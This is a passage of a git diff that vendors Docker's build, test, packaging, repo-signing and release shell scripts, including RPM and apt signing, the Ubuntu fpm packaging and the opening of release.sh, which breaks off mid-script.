+		createrepo --pretty "$REPO/$suite"
+	fi
+
+	# path to rpms
+	RPMFILE=( "bundles/$VERSION/build-rpm/$version/RPMS/"*"/docker-engine"*.rpm "bundles/$VERSION/build-rpm/$version/SRPMS/docker-engine"*.rpm )
+
+	# if we have a $GPG_PASSPHRASE we may as well
+	# sign the rpms before adding to repo
+	if [ ! -z $GPG_PASSPHRASE ]; then
+		# export our key to rpm import
+		gpg --armor --export "$GPG_KEYID" > /tmp/gpg
+		rpm --import /tmp/gpg
+
+		# sign the rpms
+		echo "yes" | setsid rpm \
+			--define "_gpg_name $GPG_KEYID" \
+			--define "_signature gpg" \
+			--define "__gpg_check_password_cmd /bin/true" \
+			--define "__gpg_sign_cmd %{__gpg} gpg --batch --no-armor --digest-algo 'sha512' --passphrase '$GPG_PASSPHRASE' --no-secmem-warning -u '%{_gpg_name}' --sign --detach-sign --output %{__signature_filename} %{__plaintext_filename}" \
+			--resign "${RPMFILE[@]}"
+	fi
+
+	# copy the rpms to the packages folder
+	cp "${RPMFILE[@]}" "$REPO/$suite/Packages"
+
+	# update the repo
+	createrepo --pretty --update "$REPO/$suite"
+done
diff --git a/vendor/github.com/docker/docker/hack/make/run b/vendor/github.com/docker/docker/hack/make/run
new file mode 100644
index 0000000000..37cfd53b5f
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/make/run
@@ -0,0 +1,44 @@
+#!/bin/bash
+
+set -e
+rm -rf "$DEST"
+
+if ! command -v dockerd &> /dev/null; then
+	echo >&2 'error: binary-daemon or dynbinary-daemon must be run before run'
+	false
+fi
+
+DOCKER_GRAPHDRIVER=${DOCKER_GRAPHDRIVER:-vfs}
+DOCKER_USERLANDPROXY=${DOCKER_USERLANDPROXY:-true}
+
+# example usage: DOCKER_STORAGE_OPTS="dm.basesize=20G,dm.loopdatasize=200G"
+storage_params=""
+if [ -n "$DOCKER_STORAGE_OPTS" ]; then
+	IFS=','
+	for i in ${DOCKER_STORAGE_OPTS}; do
+		storage_params="--storage-opt $i $storage_params"
+	done
+	unset IFS
+fi
+
+
+listen_port=2375
+if [ -n "$DOCKER_PORT" ]; then
+	IFS=':' read -r -a ports <<< "$DOCKER_PORT"
+	listen_port="${ports[-1]}"
+fi
+
+extra_params=""
+if [ "$DOCKER_REMAP_ROOT" ]; then
+	extra_params="--userns-remap $DOCKER_REMAP_ROOT"
+fi
+
+args="--debug \
+	--host tcp://0.0.0.0:${listen_port} --host unix:///var/run/docker.sock \
+	--storage-driver "$DOCKER_GRAPHDRIVER" \
+	--userland-proxy="$DOCKER_USERLANDPROXY" \
+	$storage_params \
+	$extra_params"
+
+echo dockerd $args
+exec dockerd $args
diff --git a/vendor/github.com/docker/docker/hack/make/sign-repos b/vendor/github.com/docker/docker/hack/make/sign-repos
new file mode 100755
index 0000000000..6ed1606885
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/make/sign-repos
@@ -0,0 +1,65 @@
+#!/bin/bash
+
+# This script signs the deliverables from release-deb and release-rpm
+# with a designated GPG key.
+
+: ${DOCKER_RELEASE_DIR:=$DEST}
+: ${GPG_KEYID:=releasedocker}
+APTDIR=$DOCKER_RELEASE_DIR/apt/repo
+YUMDIR=$DOCKER_RELEASE_DIR/yum/repo
+
+if [ -z "$GPG_PASSPHRASE" ]; then
+	echo >&2 'you need to set GPG_PASSPHRASE in order to sign artifacts'
+	exit 1
+fi
+
+if [ ! -d $APTDIR ] && [ ! -d $YUMDIR ]; then
+	echo >&2 'release-rpm or release-deb must be run before sign-repos'
+	exit 1
+fi
+
+sign_packages(){
+	# sign apt repo metadata
+	if [ -d $APTDIR ]; then
+		# create file with public key
+		gpg --armor --export "$GPG_KEYID" > "$DOCKER_RELEASE_DIR/apt/gpg"
+
+		# sign the repo metadata
+		for F in $(find $APTDIR -name Release); do
+			if test "$F" -nt "$F.gpg" ; then
+				gpg -u "$GPG_KEYID" --passphrase "$GPG_PASSPHRASE" \
+					--digest-algo "sha512" \
+					--armor --sign --detach-sign \
+					--batch --yes \
+					--output "$F.gpg" "$F"
+			fi
+			inRelease="$(dirname "$F")/InRelease"
+			if test "$F" -nt "$inRelease" ; then
+				gpg -u "$GPG_KEYID" --passphrase "$GPG_PASSPHRASE" \
+					--digest-algo "sha512" \
+					--clearsign \
+					--batch --yes \
+					--output "$inRelease" "$F"
+			fi
+		done
+	fi
+
+	# sign yum repo metadata
+	if [ -d $YUMDIR ]; then
+		# create file with public key
+		gpg --armor --export "$GPG_KEYID" > "$DOCKER_RELEASE_DIR/yum/gpg"
+
+		# sign the repo metadata
+		for F in $(find $YUMDIR -name repomd.xml); do
+			if test "$F" -nt "$F.asc" ; then
+				gpg -u "$GPG_KEYID" --passphrase "$GPG_PASSPHRASE" \
+					--digest-algo "sha512" \
+					--armor --sign --detach-sign \
+					--batch --yes \
+					--output "$F.asc" "$F"
+			fi
+		done
+	fi
+}
+
+sign_packages
diff --git a/vendor/github.com/docker/docker/hack/make/test-deb-install b/vendor/github.com/docker/docker/hack/make/test-deb-install
new file mode 100755
index 0000000000..aec5847600
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/make/test-deb-install
@@ -0,0 +1,71 @@
+#!/bin/bash
+# This script is used for testing install.sh and that it works for
+# each of component of our apt and yum repos
+set -e
+
+: ${DEB_DIR:="$(pwd)/bundles/$(cat VERSION)/build-deb"}
+
+if [[ ! -d "${DEB_DIR}" ]]; then
+	echo "you must first run `make deb` or hack/make/build-deb"
+	exit 1
+fi
+
+test_deb_install(){
+	# test for each Dockerfile in contrib/builder
+
+	builderDir="contrib/builder/deb/${PACKAGE_ARCH}"
+	pkgs=( $(find "${builderDir}/"*/ -type d) )
+	if [ ! -z "$DOCKER_BUILD_PKGS" ]; then
+		pkgs=()
+		for p in $DOCKER_BUILD_PKGS; do
+			pkgs+=( "$builderDir/$p" )
+		done
+	fi
+	for dir in "${pkgs[@]}"; do
+		[ -d "$dir" ] || { echo >&2 "skipping nonexistent $dir"; continue; }
+		local from="$(awk 'toupper($1) == "FROM" { print $2; exit }' "$dir/Dockerfile")"
+		local dir=$(basename "$dir")
+
+		if [[ ! -d "${DEB_DIR}/${dir}" ]]; then
+			echo "No deb found for ${dir}"
+			exit 1
+		fi
+
+		local script=$(mktemp /tmp/install-XXXXXXXXXX.sh)
+		cat <<-EOF > "${script}"
+		#!/bin/bash
+		set -e
+		set -x
+
+		apt-get update && apt-get install -y apparmor
+
+		dpkg -i /root/debs/*.deb || true
+
+		apt-get install -yf
+
+		/etc/init.d/apparmor start
+
+		# this will do everything _except_ load the profile into the kernel
+		(
+		cd /etc/apparmor.d
+		/sbin/apparmor_parser --skip-kernel-load docker-engine
+		)
+		EOF
+
+		chmod +x "${script}"
+
+		echo "testing deb install for ${from}"
+		docker run --rm -i --privileged \
+			-v ${DEB_DIR}/${dir}:/root/debs \
+			-v ${script}:/install.sh \
+			${from} /install.sh
+
+		rm -f ${script}
+	done
+}
+
+(
+	bundle .integration-daemon-start
+	test_deb_install
+	bundle .integration-daemon-stop
+) 2>&1 | tee -a "$DEST/test.log"
diff --git a/vendor/github.com/docker/docker/hack/make/test-docker-py b/vendor/github.com/docker/docker/hack/make/test-docker-py
new file mode 100644
index 0000000000..fcacc16436
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/make/test-docker-py
@@ -0,0 +1,20 @@
+#!/bin/bash
+set -e
+
+source hack/make/.integration-test-helpers
+
+# subshell so that we can export PATH without breaking other things
+(
+	bundle .integration-daemon-start
+
+	dockerPy='/docker-py'
+	[ -d "$dockerPy" ] || {
+		dockerPy="$DEST/docker-py"
+		git clone https://github.com/docker/docker-py.git "$dockerPy"
+	}
+
+	# exporting PYTHONPATH to import "docker" from our local docker-py
+	test_env PYTHONPATH="$dockerPy" py.test --junitxml="$DEST/results.xml" "$dockerPy/tests/integration"
+
+	bundle .integration-daemon-stop
+) 2>&1 | tee -a "$DEST/test.log"
diff --git a/vendor/github.com/docker/docker/hack/make/test-install-script b/vendor/github.com/docker/docker/hack/make/test-install-script
new file mode 100755
index 0000000000..4782cbea88
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/make/test-install-script
@@ -0,0 +1,31 @@
+#!/bin/bash
+# This script is used for testing install.sh and that it works for
+# each of component of our apt and yum repos
+set -e
+
+test_install_script(){
+	# these are equivalent to main, testing, experimental components
+	# in the repos, but its the url that will do the conversion
+	components=( experimental test get )
+
+	for component in "${components[@]}"; do
+		# change url to specific component for testing
+		local test_url=https://${component}.docker.com
+		local script=$(mktemp /tmp/install-XXXXXXXXXX.sh)
+		sed "s,url='https://get.docker.com/',url='${test_url}/'," hack/install.sh > "${script}"
+
+		chmod +x "${script}"
+
+		# test for each Dockerfile in contrib/builder
+		for dir in contrib/builder/*/*/; do
+			local from="$(awk 'toupper($1) == "FROM" { print $2; exit }' "$dir/Dockerfile")"
+
+			echo "running install.sh for ${component} with ${from}"
+			docker run --rm -i -v ${script}:/install.sh ${from} /install.sh
+		done
+
+		rm -f ${script}
+	done
+}
+
+test_install_script
diff --git a/vendor/github.com/docker/docker/hack/make/test-integration-cli b/vendor/github.com/docker/docker/hack/make/test-integration-cli
new file mode 100755
index 0000000000..689a5285f3
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/make/test-integration-cli
@@ -0,0 +1,28 @@
+#!/bin/bash
+set -e
+
+source hack/make/.integration-test-helpers
+
+# subshell so that we can export PATH without breaking other things
+(
+	bundle .integration-daemon-start
+
+	bundle .integration-daemon-setup
+
+	bundle_test_integration_cli
+
+	bundle .integration-daemon-stop
+
+	if [ "$(go env GOOS)" != 'windows' ]
+	then
+		leftovers=$(ps -ax -o pid,cmd | awk '$2 == "docker-containerd-shim" && $4 ~ /.*\/bundles\/.*\/test-integration-cli/ { print $1 }')
+		if [ -n "$leftovers" ]
+		then
+			ps aux
+			kill -9 $leftovers 2> /dev/null
+			echo "!!!! WARNING you have left over shim(s), Cleanup your test !!!!"
+			exit 1
+		fi
+	fi
+
+) 2>&1 | tee -a "$DEST/test.log"
diff --git a/vendor/github.com/docker/docker/hack/make/test-integration-shell b/vendor/github.com/docker/docker/hack/make/test-integration-shell
new file mode 100644
index 0000000000..86df9654a3
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/make/test-integration-shell
@@ -0,0 +1,7 @@
+#!/bin/bash
+
+bundle .integration-daemon-start
+bundle .integration-daemon-setup
+
+export ABS_DEST
+bash +e
diff --git a/vendor/github.com/docker/docker/hack/make/test-old-apt-repo b/vendor/github.com/docker/docker/hack/make/test-old-apt-repo
new file mode 100755
index 0000000000..bb20128e30
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/make/test-old-apt-repo
@@ -0,0 +1,29 @@
+#!/bin/bash
+set -e
+
+versions=( 1.3.3 1.4.1 1.5.0 1.6.2 )
+
+install() {
+	local version=$1
+	local tmpdir=$(mktemp -d /tmp/XXXXXXXXXX)
+	local dockerfile="${tmpdir}/Dockerfile"
+	cat <<-EOF > "$dockerfile"
+	FROM debian:jessie
+	ENV VERSION ${version}
+	RUN apt-get update && apt-get install -y \
+		apt-transport-https \
+		ca-certificates \
+		--no-install-recommends
+	RUN echo "deb https://get.docker.com/ubuntu docker main" > /etc/apt/sources.list.d/docker.list
+	RUN apt-key adv --keyserver hkp://keyserver.ubuntu.com:80 \
+		--recv-keys 36A1D7869245C8950F966E92D8576A8BA88D21E9
+	RUN apt-get update && apt-get install -y \
+		lxc-docker-\${VERSION}
+	EOF
+
+	docker build --rm --force-rm --no-cache -t docker-old-repo:${version} -f $dockerfile $tmpdir
+}
+
+for v in "${versions[@]}"; do
+	install "$v"
+done
diff --git a/vendor/github.com/docker/docker/hack/make/test-unit b/vendor/github.com/docker/docker/hack/make/test-unit
new file mode 100644
index 0000000000..f263345ce6
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/make/test-unit
@@ -0,0 +1,55 @@
+#!/bin/bash
+set -e
+
+# Run Docker's test suite, including sub-packages, and store their output as a bundle
+# If $TESTFLAGS is set in the environment, it is passed as extra arguments to 'go test'.
+# You can use this to select certain tests to run, e.g.
+#
+#   TESTFLAGS='-test.run ^TestBuild$' ./hack/make.sh test-unit
+#
+bundle_test_unit() {
+	TESTFLAGS+=" -test.timeout=${TIMEOUT}"
+	INCBUILD="-i"
+	count=0
+	for flag in "${BUILDFLAGS[@]}"; do
+		if [ "${flag}" == ${INCBUILD} ]; then
+			unset BUILDFLAGS[${count}]
+			break
+		fi
+		count=$[ ${count} + 1 ]
+	done
+
+	date
+	if [ -z "$TESTDIRS" ]; then
+		TEST_PATH=./...
+	else
+		TEST_PATH=./${TESTDIRS}
+	fi
+
+	if [ "$(go env GOHOSTOS)" = 'solaris' ]; then
+		pkg_list=$(go list -e \
+			-f '{{if ne .Name "github.com/docker/docker"}}
+				{{.ImportPath}}
+			    {{end}}' \
+			"${BUILDFLAGS[@]}" $TEST_PATH \
+			| grep github.com/docker/docker \
+			| grep -v github.com/docker/docker/vendor \
+			| grep -v github.com/docker/docker/daemon/graphdriver \
+			| grep -v github.com/docker/docker/man \
+			| grep -v github.com/docker/docker/integration-cli)
+	else
+		pkg_list=$(go list -e \
+			-f '{{if ne .Name "github.com/docker/docker"}}
+				{{.ImportPath}}
+			    {{end}}' \
+			"${BUILDFLAGS[@]}" $TEST_PATH \
+			| grep github.com/docker/docker \
+			| grep -v github.com/docker/docker/vendor \
+			| grep -v github.com/docker/docker/man \
+			| grep -v github.com/docker/docker/integration-cli)
+	fi
+
+	go test -cover -ldflags "$LDFLAGS" "${BUILDFLAGS[@]}" $TESTFLAGS $pkg_list
+}
+
+bundle_test_unit 2>&1 | tee -a "$DEST/test.log"
diff --git a/vendor/github.com/docker/docker/hack/make/tgz b/vendor/github.com/docker/docker/hack/make/tgz
new file mode 100644
index 0000000000..3ccd93fa01
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/make/tgz
@@ -0,0 +1,92 @@
+#!/bin/bash
+
+CROSS="$DEST/../cross"
+
+set -e
+
+arch=$(go env GOHOSTARCH)
+if [ ! -d "$CROSS/linux/${arch}" ]; then
+	echo >&2 'error: binary and cross must be run before tgz'
+	false
+fi
+
+(
+for d in "$CROSS/"*/*; do
+	export GOARCH="$(basename "$d")"
+	export GOOS="$(basename "$(dirname "$d")")"
+
+	source "${MAKEDIR}/.binary-setup"
+
+	BINARY_NAME="${DOCKER_CLIENT_BINARY_NAME}-$VERSION"
+	DAEMON_BINARY_NAME="${DOCKER_DAEMON_BINARY_NAME}-$VERSION"
+	PROXY_BINARY_NAME="${DOCKER_PROXY_BINARY_NAME}-$VERSION"
+	BINARY_EXTENSION="$(export GOOS && binary_extension)"
+	if [ "$GOOS" = 'windows' ]; then
+		# if windows use a zip, not tgz
+		BUNDLE_EXTENSION=".zip"
+		IS_TAR="false"
+	elif [ "$GOOS" == "solaris" ]; then
+		# Solaris bypasses cross due to CGO issues.
+		continue
+	else
+		BUNDLE_EXTENSION=".tgz"
+		IS_TAR="true"
+	fi
+	BINARY_FULLNAME="$BINARY_NAME$BINARY_EXTENSION"
+	DAEMON_BINARY_FULLNAME="$DAEMON_BINARY_NAME$BINARY_EXTENSION"
+	PROXY_BINARY_FULLNAME="$PROXY_BINARY_NAME$BINARY_EXTENSION"
+	mkdir -p "$DEST/$GOOS/$GOARCH"
+	TGZ="$DEST/$GOOS/$GOARCH/$BINARY_NAME$BUNDLE_EXTENSION"
+
+	# The staging directory for the files in the tgz
+	BUILD_PATH="$DEST/build"
+
+	# The directory that is at the root of the tar file
+	TAR_BASE_DIRECTORY="docker"
+
+	# $DEST/build/docker
+	TAR_PATH="$BUILD_PATH/$TAR_BASE_DIRECTORY"
+
+	# Copy the correct docker binary
+	mkdir -p $TAR_PATH
+	cp -L "$d/$BINARY_FULLNAME" "$TAR_PATH/${DOCKER_CLIENT_BINARY_NAME}${BINARY_EXTENSION}"
+	if [ -f "$d/$DAEMON_BINARY_FULLNAME" ]; then
+		cp -L "$d/$DAEMON_BINARY_FULLNAME" "$TAR_PATH/${DOCKER_DAEMON_BINARY_NAME}${BINARY_EXTENSION}"
+	fi
+	if [ -f "$d/$PROXY_BINARY_FULLNAME" ]; then
+		cp -L "$d/$PROXY_BINARY_FULLNAME" "$TAR_PATH/${DOCKER_PROXY_BINARY_NAME}${BINARY_EXTENSION}"
+	fi
+
+	# copy over all the extra binaries
+	copy_binaries $TAR_PATH
+
+	# add completions
+	for s in bash fish zsh; do
+		mkdir -p $TAR_PATH/completion/$s
+		cp -L contrib/completion/$s/*docker* $TAR_PATH/completion/$s/
+	done
+
+	if [ "$IS_TAR" == "true" ]; then
+		echo "Creating tgz from $BUILD_PATH and naming it $TGZ"
+		tar --numeric-owner --owner 0 -C "$BUILD_PATH" -czf "$TGZ" $TAR_BASE_DIRECTORY
+	else
+		# ZIP needs to full absolute dir path, not the absolute path
+		ZIP=`pwd`"/$TGZ"
+		# keep track of where we are, for later.
+		pushd .
+		# go into the BUILD_PATH since zip does not have a -C equivalent.
+		cd $BUILD_PATH
+		echo "Creating zip from $BUILD_PATH and naming it $ZIP"
+		zip -q -r $ZIP $TAR_BASE_DIRECTORY
+		# go back to where we started
+		popd
+	fi
+
+	hash_files "$TGZ"
+
+	# cleanup after ourselves
+	rm -rf "$BUILD_PATH"
+
+	echo "Created tgz: $TGZ"
+done
+)
diff --git a/vendor/github.com/docker/docker/hack/make/ubuntu b/vendor/github.com/docker/docker/hack/make/ubuntu
new file mode 100644
index 0000000000..8de5d9ceac
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/make/ubuntu
@@ -0,0 +1,190 @@
+#!/bin/bash
+
+PKGVERSION="${VERSION//-/'~'}"
+# if we have a "-dev" suffix or have change in Git, let's make this package version more complex so it works better
+if [[ "$VERSION" == *-dev ]] || [ -n "$(git status --porcelain)" ]; then
+	GIT_UNIX="$(git log -1 --pretty='%at')"
+	GIT_DATE="$(date --date "@$GIT_UNIX" +'%Y%m%d.%H%M%S')"
+	GIT_COMMIT="$(git log -1 --pretty='%h')"
+	GIT_VERSION="git${GIT_DATE}.0.${GIT_COMMIT}"
+	# GIT_VERSION is now something like 'git20150128.112847.0.17e840a'
+	PKGVERSION="$PKGVERSION~$GIT_VERSION"
+fi
+
+# $ dpkg --compare-versions 1.5.0 gt 1.5.0~rc1 && echo true || echo false
+# true
+# $ dpkg --compare-versions 1.5.0~rc1 gt 1.5.0~git20150128.112847.17e840a && echo true || echo false
+# true
+# $ dpkg --compare-versions 1.5.0~git20150128.112847.17e840a gt 1.5.0~dev~git20150128.112847.17e840a && echo true || echo false
+# true
+
+# ie, 1.5.0 > 1.5.0~rc1 > 1.5.0~git20150128.112847.17e840a > 1.5.0~dev~git20150128.112847.17e840a
+
+PACKAGE_ARCHITECTURE="$(dpkg-architecture -qDEB_HOST_ARCH)"
+PACKAGE_URL="https://www.docker.com/"
+PACKAGE_MAINTAINER="support@docker.com"
+PACKAGE_DESCRIPTION="Linux container runtime
+Docker complements LXC with a high-level API which operates at the process
+level. It runs unix processes with strong guarantees of isolation and
+repeatability across servers.
+Docker is a great building block for automating distributed systems:
+large-scale web deployments, database clusters, continuous deployment systems,
+private PaaS, service-oriented architectures, etc."
+PACKAGE_LICENSE="Apache-2.0"
+
+# Build docker as an ubuntu package using FPM and REPREPRO (sue me).
+# bundle_binary must be called first.
+bundle_ubuntu() {
+	DIR="$ABS_DEST/build"
+
+	# Include our udev rules
+	mkdir -p "$DIR/etc/udev/rules.d"
+	cp contrib/udev/80-docker.rules "$DIR/etc/udev/rules.d/"
+
+	# Include our init scripts
+	mkdir -p "$DIR/etc/init"
+	cp contrib/init/upstart/docker.conf "$DIR/etc/init/"
+	mkdir -p "$DIR/etc/init.d"
+	cp contrib/init/sysvinit-debian/docker "$DIR/etc/init.d/"
+	mkdir -p "$DIR/etc/default"
+	cp contrib/init/sysvinit-debian/docker.default "$DIR/etc/default/docker"
+	mkdir -p "$DIR/lib/systemd/system"
+	cp contrib/init/systemd/docker.{service,socket} "$DIR/lib/systemd/system/"
+
+	# Include contributed completions
+	mkdir -p "$DIR/etc/bash_completion.d"
+	cp contrib/completion/bash/docker "$DIR/etc/bash_completion.d/"
+	mkdir -p "$DIR/usr/share/zsh/vendor-completions"
+	cp contrib/completion/zsh/_docker "$DIR/usr/share/zsh/vendor-completions/"
+	mkdir -p "$DIR/etc/fish/completions"
+	cp contrib/completion/fish/docker.fish "$DIR/etc/fish/completions/"
+
+	# Include man pages
+	make manpages
+	manRoot="$DIR/usr/share/man"
+	mkdir -p "$manRoot"
+	for manDir in man/man?; do
+		manBase="$(basename "$manDir")" # "man1"
+		for manFile in "$manDir"/*; do
+			manName="$(basename "$manFile")" # "docker-build.1"
+			mkdir -p "$manRoot/$manBase"
+			gzip -c "$manFile" > "$manRoot/$manBase/$manName.gz"
+		done
+	done
+
+	# Copy the binary
+	# This will fail if the binary bundle hasn't been built
+	mkdir -p "$DIR/usr/bin"
+	cp "$DEST/../binary/docker-$VERSION" "$DIR/usr/bin/docker"
+
+	# Generate postinst/prerm/postrm scripts
+	cat > "$DEST/postinst" <<'EOF'
+#!/bin/sh
+set -e
+set -u
+
+if [ "$1" = 'configure' ] && [ -z "$2" ]; then
+	if ! getent group docker > /dev/null; then
+		groupadd --system docker
+	fi
+fi
+
+if ! { [ -x /sbin/initctl ] && /sbin/initctl version 2>/dev/null | grep -q upstart; }; then
+	# we only need to do this if upstart isn't in charge
+	update-rc.d docker defaults > /dev/null || true
+fi
+if [ -n "$2" ]; then
+	_dh_action=restart
+else
+	_dh_action=start
+fi
+service docker $_dh_action 2>/dev/null || true
+
+#DEBHELPER#
+EOF
+	cat > "$DEST/prerm" <<'EOF'
+#!/bin/sh
+set -e
+set -u
+
+service docker stop 2>/dev/null || true
+
+#DEBHELPER#
+EOF
+	cat > "$DEST/postrm" <<'EOF'
+#!/bin/sh
+set -e
+set -u
+
+if [ "$1" = "purge" ] ; then
+	update-rc.d docker remove > /dev/null || true
+fi
+
+# In case this system is running systemd, we make systemd reload the unit files
+# to pick up changes.
+if [ -d /run/systemd/system ] ; then
+	systemctl --system daemon-reload > /dev/null || true
+fi
+
+#DEBHELPER#
+EOF
+	# TODO swaths of these were borrowed from debhelper's auto-inserted stuff, because we're still using fpm - we need to use debhelper instead, and somehow reconcile Ubuntu that way
+	chmod +x "$DEST/postinst" "$DEST/prerm" "$DEST/postrm"
+
+	(
+		# switch directories so we create *.deb in the right folder
+		cd "$DEST"
+
+		# create lxc-docker-VERSION package
+		fpm -s dir -C "$DIR" \
+			--name "lxc-docker-$VERSION" --version "$PKGVERSION" \
+			--after-install "$ABS_DEST/postinst" \
+			--before-remove "$ABS_DEST/prerm" \
+			--after-remove "$ABS_DEST/postrm" \
+			--architecture "$PACKAGE_ARCHITECTURE" \
+			--prefix / \
+			--depends iptables \
+			--deb-recommends aufs-tools \
+			--deb-recommends ca-certificates \
+			--deb-recommends git \
+			--deb-recommends xz-utils \
+			--deb-recommends 'cgroupfs-mount | cgroup-lite' \
+			--deb-suggests apparmor \
+			--description "$PACKAGE_DESCRIPTION" \
+			--maintainer "$PACKAGE_MAINTAINER" \
+			--conflicts docker \
+			--conflicts docker.io \
+			--conflicts lxc-docker-virtual-package \
+			--provides lxc-docker \
+			--provides lxc-docker-virtual-package \
+			--replaces lxc-docker \
+			--replaces lxc-docker-virtual-package \
+			--url "$PACKAGE_URL" \
+			--license "$PACKAGE_LICENSE" \
+			--config-files /etc/udev/rules.d/80-docker.rules \
+			--config-files /etc/init/docker.conf \
+			--config-files /etc/init.d/docker \
+			--config-files /etc/default/docker \
+			--deb-compression gz \
+			-t deb .
+		# TODO replace "Suggests: cgroup-lite" with "Recommends: cgroupfs-mount | cgroup-lite" once cgroupfs-mount is available
+
+		# create empty lxc-docker wrapper package
+		fpm -s empty \
+			--name lxc-docker --version "$PKGVERSION" \
+			--architecture "$PACKAGE_ARCHITECTURE" \
+			--depends lxc-docker-$VERSION \
+			--description "$PACKAGE_DESCRIPTION" \
+			--maintainer "$PACKAGE_MAINTAINER" \
+			--url "$PACKAGE_URL" \
+			--license "$PACKAGE_LICENSE" \
+			--deb-compression gz \
+			-t deb
+	)
+
+	# clean up after ourselves so we have a clean output directory
+	rm "$DEST/postinst" "$DEST/prerm" "$DEST/postrm"
+	rm -r "$DIR"
+}
+
+bundle_ubuntu
diff --git a/vendor/github.com/docker/docker/hack/make/update-apt-repo b/vendor/github.com/docker/docker/hack/make/update-apt-repo
new file mode 100755
index 0000000000..7354a2ecff
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/make/update-apt-repo
@@ -0,0 +1,70 @@
+#!/bin/bash
+set -e
+
+# This script updates the apt repo in $DOCKER_RELEASE_DIR/apt/repo.
+# This script is a "fix all" for any sort of problems that might have occurred with
+# the Release or Package files in the repo.
+# It should only be used in the rare case of extreme emergencies to regenerate
+# Release and Package files for the apt repo.
+#
+# NOTE: Always be sure to re-sign the repo with hack/make/sign-repos after running
+# this script.
+
+: ${DOCKER_RELEASE_DIR:=$DEST}
+APTDIR=$DOCKER_RELEASE_DIR/apt/repo
+
+# supported arches/sections
+arches=( amd64 i386 )
+
+# Preserve existing components but don't add any non-existing ones
+for component in main testing experimental ; do
+	if ls "$APTDIR/dists/*/$component" >/dev/null 2>&1 ; then
+		components+=( $component )
+	fi
+done
+
+dists=( $(find "${APTDIR}/dists" -maxdepth 1 -mindepth 1 -type d) )
+
+# override component if it is set
+if [ "$COMPONENT" ]; then
+	components=( $COMPONENT )
+fi
+
+# release the debs
+for version in "${dists[@]}"; do
+	for component in "${components[@]}"; do
+		codename="${version//debootstrap-}"
+
+		# update the filelist for this codename/component
+		find "$APTDIR/pool/$component" \
+			-name *~${codename#*-}*.deb > "$APTDIR/dists/$codename/$component/filelist"
+	done
+done
+
+# run the apt-ftparchive commands so we can have pinning
+apt-ftparchive generate "$APTDIR/conf/apt-ftparchive.conf"
+
+for dist in "${dists[@]}"; do
+	version=$(basename "$dist")
+	for component in "${components[@]}"; do
+		codename="${version//debootstrap-}"
+
+		apt-ftparchive \
+			-o "APT::FTPArchive::Release::Codename=$codename" \
+			-o "APT::FTPArchive::Release::Suite=$codename" \
+			-c "$APTDIR/conf/docker-engine-release.conf" \
+			release \
+			"$APTDIR/dists/$codename" > "$APTDIR/dists/$codename/Release"
+
+		for arch in "${arches[@]}"; do
+			apt-ftparchive \
+				-o "APT::FTPArchive::Release::Codename=$codename" \
+				-o "APT::FTPArchive::Release::Suite=$codename" \
+				-o "APT::FTPArchive::Release::Component=$component" \
+				-o "APT::FTPArchive::Release::Architecture=$arch" \
+				-c "$APTDIR/conf/docker-engine-release.conf" \
+				release \
+				"$APTDIR/dists/$codename/$component/binary-$arch" > "$APTDIR/dists/$codename/$component/binary-$arch/Release"
+		done
+	done
+done
diff --git a/vendor/github.com/docker/docker/hack/make/win b/vendor/github.com/docker/docker/hack/make/win
new file mode 100644
index 0000000000..f9f4111276
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/make/win
@@ -0,0 +1,20 @@
+#!/bin/bash
+set -e
+
+# explicit list of os/arch combos that support being a daemon
+declare -A daemonSupporting
+daemonSupporting=(
+	[linux/amd64]=1
+	[windows/amd64]=1
+)
+platform="windows/amd64"
+export DEST="$DEST/$platform" # bundles/VERSION/cross/GOOS/GOARCH/docker-VERSION
+mkdir -p "$DEST"
+ABS_DEST="$(cd "$DEST" && pwd -P)"
+export GOOS=${platform%/*}
+export GOARCH=${platform##*/}
+if [ -z "${daemonSupporting[$platform]}" ]; then
+	export LDFLAGS_STATIC_DOCKER="" # we just need a simple client for these platforms
+	export BUILDFLAGS=( "${ORIG_BUILDFLAGS[@]/ daemon/}" ) # remove the "daemon" build tag from platforms that aren't supported
+fi
+source "${MAKEDIR}/binary"
diff --git a/vendor/github.com/docker/docker/hack/release.sh b/vendor/github.com/docker/docker/hack/release.sh
new file mode 100755
index 0000000000..4b020537ea
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/release.sh
@@ -0,0 +1,325 @@
+#!/usr/bin/env bash
+set -e
+
+# This script looks for bundles built by make.sh, and releases them on a
+# public S3 bucket.
+#
+# Bundles should be available for the VERSION string passed as argument.
+#
+# The correct way to call this script is inside a container built by the
+# official Dockerfile at the root of the Docker source code. The Dockerfile,
+# make.sh and release.sh should all be from the same source code revision.
+
+set -o pipefail
+
+# Print a usage message and exit.
+usage() {
+	cat >&2 <<'EOF'
+To run, I need:
+- to be in a container generated by the Dockerfile at the top of the Docker
+  repository;
+- to be provided with the location of an S3 bucket and path, in
+  environment variables AWS_S3_BUCKET and AWS_S3_BUCKET_PATH (default: '');
+- to be provided with AWS credentials for this S3 bucket, in environment
+  variables AWS_ACCESS_KEY_ID and AWS_SECRET_ACCESS_KEY;
+- a generous amount of good will and nice manners.
+The canonical way to run me is to run the image produced by the Dockerfile: e.g.:"
+
+docker run -e AWS_S3_BUCKET=test.docker.com \
+           -e AWS_ACCESS_KEY_ID     \
+           -e AWS_SECRET_ACCESS_KEY \
+           -e AWS_DEFAULT_REGION    \
+           -it --privileged         \
+           docker ./hack/release.sh
+EOF
+	exit 1
+}
+
+[ "$AWS_S3_BUCKET" ] || usage
+[ "$AWS_ACCESS_KEY_ID" ] || usage
+[ "$AWS_SECRET_ACCESS_KEY" ] || usage
+[ -d /go/src/github.com/docker/docker ] || usage
+cd /go/src/github.com/docker/docker
+[ -x hack/make.sh ] || usage
+
+export AWS_DEFAULT_REGION
+: ${AWS_DEFAULT_REGION:=us-west-1}
+
+AWS_CLI=${AWS_CLI:-'aws'}
+
+RELEASE_BUNDLES=(
+	binary
+	cross
+	tgz
+)
+
+if [ "$1" != '--release-regardless-of-test-failure' ]; then
